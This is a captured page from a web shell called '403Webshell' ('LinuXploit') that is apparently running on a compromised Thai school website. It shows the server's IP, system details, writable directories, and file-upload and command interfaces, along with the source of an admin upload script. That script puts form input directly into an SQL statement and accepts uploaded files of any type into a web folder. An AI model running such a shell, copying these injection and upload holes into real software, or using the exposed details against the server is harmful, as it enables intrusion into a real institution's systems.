403Webshell
Server IP : 202.29.229.35  /  Your IP : 18.217.210.224
Web Server : Apache
System : Linux aapanel2 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User : www ( 1001)
PHP Version : 5.5.38
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/www.ivecr2.ac.th/system_admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/www.ivecr2.ac.th/system_admin//visanu_Insert.php
<?php 
session_start();
error_reporting(0);
if($_SESSION['r_statuslogin'] != 1){
 echo '<script language="javascript">alert("สำหรับผู้ดูแลระบบเท่านั้น")</script>';
 echo'<meta http-equiv="refresh" content="0;url=../index.php">';
 exit();
}
?>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<?php
		
		//include('connect/connect.php');
		//include('connect/function.php');

		$title=$_POST['title'];
		$dp_id=$_SESSION['r_workId'];
		$adminID=$_SESSION['r_adID'];
				
		$file=$_FILES['filedocument']['tmp_name'];
		$file_name=$_FILES['filedocument']['name'];
		$file_size=$_FILES['filedocument']['size'];
		$file_type=$_FILES['filedocument']['type'];
	
			$ext=strtolower(end(explode('.',$file_name)));
			if($file_size=checkdownfile($ext)){
				}
				
		$filedocument_ori=date("YmdHis").'.'.$ext;
		$date=date('Y:m:d');
		$sql="insert into tblnew_visanu values (null,'$title','$filedocument_ori','$date','$adminID')";
		//echo "===>".$sql;
		$result=mysqli_query($connect1,$sql);
			if($result){
				copy($file,"pic_visanu/$filedocument_ori");
				echo "<script language='javascript'>alert('บันทึกข้อมูลเรียบร้อยแล้ว')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=visanu_from">';
			}else{
				echo "<script language='javascript'>alert('ไม่สามารถบันทึกข้อมูลได้')</script>";
				echo '<meta http-equiv="refresh" content="0;url=index.php?i=visanu_from">';
				}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit